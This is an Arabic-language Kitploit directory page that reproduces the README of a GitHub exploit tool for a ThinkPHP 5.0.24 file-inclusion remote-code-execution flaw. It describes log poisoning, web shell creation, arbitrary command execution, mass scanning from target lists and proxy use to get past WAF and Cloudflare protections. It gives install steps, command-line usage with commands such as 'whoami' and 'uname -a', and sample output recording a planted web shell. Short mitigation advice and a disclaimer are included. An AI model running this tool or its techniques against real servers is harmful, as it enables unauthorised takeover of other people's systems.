Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2025-63888-exploit — أداة بحث أمني لكشف واختبار CVE-2025-63888 (ThinkPHP 5.0.24 File Inclusion RCE vulnerability) | Kitploit
أدوات/GitHubGitHub/an5i/cve-2025-63888-exploit
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالفريق الأحمرتطوير الحمولات
GitHuban5i/cve-2025-63888-exploit

cve-2025-63888-exploit

أداة بحث أمني لكشف واختبار CVE-2025-63888 (ThinkPHP 5.0.24 File Inclusion RCE vulnerability)

عرض المستودع
1042منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-63888 استغلال تضمين الملفات وتنفيذ الأوامر عن بُعد في ThinkPHP 5.0.24

أداة بحث أمنية لاكتشاف واختبار الثغرة CVE-2025-63888 في ThinkPHP 5.0.24، والتي تسمح بتنفيذ الأوامر عن بُعد عبر هجمات تضمين الملفات.

⚠️ إخلاء مسؤولية

هذه الأداة مخصصة لأغراض الاختبارات الأمنية المصرح بها والتعليم فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. استخدم هذه الأداة فقط على الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها.

📋 نظرة عامة

CVE-2025-63888 هي ثغرة حرجة لتنفيذ الأوامر عن بُعد في ThinkPHP 5.0.24. توجد الثغرة في دالة read الموجودة في thinkphp/library/think/template/driver/File.php، مما يسمح للمهاجمين بتنفيذ أكواد عشوائية من خلال هجمات تضمين الملفات عن طريق التلاعب بمسار القالب في دالة view().

نقاط CVSS: 9.8 (حرجة)
الإصدار المتأثر: ThinkPHP 5.0.24 (إصدار محدد)
الملف المعرض للثغرة: thinkphp/library/think/template/driver/File.php دالة


الدالة المعرضة للثغرة:
read()

🔍 الميزات

  • كشف ThinkPHP آلياً: تحديد تثبيتات وإصدارات ThinkPHP
  • اختبار الثغرة: اختبار وجود ثغرة تضمين الملفات CVE-2025-63888
  • اكتشاف نقاط النهاية: العثور تلقائياً على نقاط النهاية المعرضة للخطر
  • استغلال تضمين الملفات: إظهار القدرة على تضمين الملفات
  • تسميم ملفات السجل: محاولة تسميم ملفات السجل لتحقيق تنفيذ الأوامر
  • إنشاء شيل ويب: إنشاء شيل ويب عبر تضمين الملفات
  • تنفيذ الأوامر: تنفيذ أوامر عشوائية (لأغراض الاختبار المصرح به)
  • دعم تعدد الخيوط: مسح أهداف متعددة بالتوازي
  • دعم الوكيل: تجاوز قيود WAF/Cloudflare
  • تصدير بصيغة JSON: نتائج مفصلة بصيغة JSON

📦 التثبيت

المتطلبات الأساسية

  • Python 3.6 أو أعلى
  • pip (مدير حزم Python)

التثبيت السريع

root@kitploit:~
# Clone the repository
git clone https://github.com/AN5I/cve-2025-63888-exploit.git
cd cve-2025-63888-exploit

# Install dependencies
pip install -r requirements.txt

# Make script executable (optional)
chmod +x cve_2025_63888_exploit.py

بديل: التحميل المباشر

root@kitploit:~
# Download the script
wget https://raw.githubusercontent.com/AN5I/cve-2025-63888-exploit/main/cve_2025_63888_exploit.py

# Install dependencies
pip install requests

🚀 الاستخدام

الاستخدام الأساسي

root@kitploit:~
# Single target
python3 cve_2025_63888_exploit.py -u http://target.com

# Execute custom command
python3 cve_2025_63888_exploit.py -u http://target.com -c "whoami"

# Multiple targets from file
python3 cve_2025_63888_exploit.py -f targets.txt -o results.json

# With threading for faster scanning
python3 cve_2025_63888_exploit.py -u http://target.com -t 5

# Verbose output for debugging
python3 cve_2025_63888_exploit.py -u http://target.com -v

استخدام الوكلاء

root@kitploit:~
# Single proxy
python3 cve_2025_63888_exploit.py -u http://target.com --proxy http://proxy:port

# Multiple proxies from file
python3 cve_2025_63888_exploit.py -f targets.txt --proxy-list proxies.txt

خيارات سطر الأوامر

root@kitploit:~
-u, --url          Target URL
-f, --file         File containing target URLs (one per line)
-c, --command      Command to execute (default: id)
-t, --threads      Number of threads (default: 1)
-o, --output       Output file (default: uknf_results.json)
-v, --verbose      Enable verbose logging
--proxy            Proxy URL (e.g., http://127.0.0.1:8080)
--proxy-list       File containing proxy URLs (one per line)

📊 المخرجات

يقوم البرنامج النصي بإنشاء ملف JSON بنتائج مفصلة:

root@kitploit:~
{
  "target": "http://target.com",
  "timestamp": "2025-11-20T15:05:35.763409",
  "vulnerable": true,
  "endpoint_found": true,
  "exploitation_successful": true,
  "command_executed": "id",
  "output": "uid=1000(user) gid=1000(user)...",
  "vulnerable_endpoint": "/index.php/index/index/view",
  "webshell_created": true,
  "webshell_path": "../../../runtime/log/2025/11/18.log"
}

🔬 كيف يعمل

  1. مرحلة الكشف: يفحص إشارات إطار العمل ThinkPHP
  2. كشف الإصدار: يحاول تحديد إصدار ThinkPHP (5.0.24)
  3. اختبار الثغرة: يختبر وجود ثغرة تضمين الملفات
  4. اكتشاف نقاط النهاية: يجد نقاط النهاية المعرضة للخطر باستخدام دالة view()
  5. الاستغلال: يظهر القدرة على تنفيذ الأوامر عن بُعد من خلال تضمين الملفات

🛡️ وسائل التخفيف

إذا كنت تستخدم ThinkPHP 5.0.24:

  1. قم بالترقية فوراً:

    • التحديث إلى ThinkPHP 5.0.25+ أو أحدث
    • أو الترقية إلى ThinkPHP 6.x/7.x
  2. تنفيذ التحقق من المسار:

    • أضف تحققاً صارماً من المسار في دالة view()
    • منع أحرف اجتياز الدليل (../, ..)
    • قصر مسارات القوالب على أدلة القائمة البيضاء
  3. إصلاحات على مستوى الكود:

    • تحقق من صحة مسارات القوالب قبل المعالجة
    • استخدم realpath() لضمان وجود الملفات ضمن الأدلة المسموح بها
    • تطبيق قائمة بيضاء للدوال

📚 المراجع

  • CVE: CVE-2025-63888
  • GitHub Gist: تفاصيل CVE-2025-63888
  • مقال Yuque: تحليل مفصل
  • دليل ThinkPHP: التوثيق الرسمي

📖 أمثلة

مثال 1: مسح هدف واحد

root@kitploit:~
python3 cve_2025_63888_exploit.py -u https://example.com

مثال 2: أهداف متعددة مع مخرجات

root@kitploit:~
# Create targets file
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt

# Run scan
python3 cve_2025_63888_exploit.py -f targets.txt -o results.json

مثال 3: تنفيذ أمر مخصص

root@kitploit:~
python3 cve_2025_63888_exploit.py -u https://example.com -c "uname -a"

مثال 4: استخدام الوكلاء

root@kitploit:~
# Single proxy
python3 cve_2025_63888_exploit.py -u https://example.com --proxy http://127.0.0.1:8080

# Multiple proxies from file
echo "http://proxy1:8080" > proxies.txt
echo "http://proxy2:8080" >> proxies.txt
python3 cve_2025_63888_exploit.py -f targets.txt --proxy-list proxies.txt

🤝 المساهمة

المساهمات مرحب بها! لا تتردد في تقديم طلب سحب (Pull Request).

  1. قم بعمل Fork للمستودع
  2. أنشئ فرع الميزة الخاص بك (git checkout -b feature/AmazingFeature)
  3. قم بعمل Commit للتغييرات (git commit -m 'Add some AmazingFeature')
  4. ادفع إلى الفرع (git push origin feature/AmazingFeature)
  5. افتح طلب سحب (Pull Request)

🐛 المشكلات

إذا واجهت أي مشكلات أو كان لديك اقتراحات، يرجى فتح مشكلة (Issue) على GitHub.

📝 الترخيص

هذا المشروع مرخص بموجب ترخيص MIT - راجع ملف LICENSE للحصول على التفاصيل.

⭐ تاريخ النجوم

إذا وجدت هذه الأداة مفيدة، فيرجى التفكير في منحها نجمة (star) على GitHub!

⚖️ الجوانب القانونية

هذه الأداة مقدمة لأغراض تعليمية واختبارات أمنية مصرح بها فقط. المؤلفون غير مسؤولين عن أي استخدام خاطئ أو ضرر ناتج عن هذا البرنامج. المستخدمون مسؤولون عن ضمان حصولهم على التصريح المناسب قبل اختبار أي أنظمة.

🙏 شكر وتقدير

  • مبلغ الثغرة الأصلي: Master-0-0
  • مجتمع أمن ThinkPHP
  • باحثو الأمن الذين ساهموا في تحليل الثغرة

💰 التبرعات

إذا وجدت هذه الأداة مفيدة وترغب في دعم المشروع:

بيتكوين (BTC):

root@kitploit:~
bc1qj95y35w8r2mw0u28zrm3dmxtzjkq258xdv8tzv

إيثريوم (ETH):

root@kitploit:~
0x3DC302a3f35F6cD1A03FF4982EcE0dE8fE1cEba7

شكراً لدعمك! 🙏

تنزيل الأداة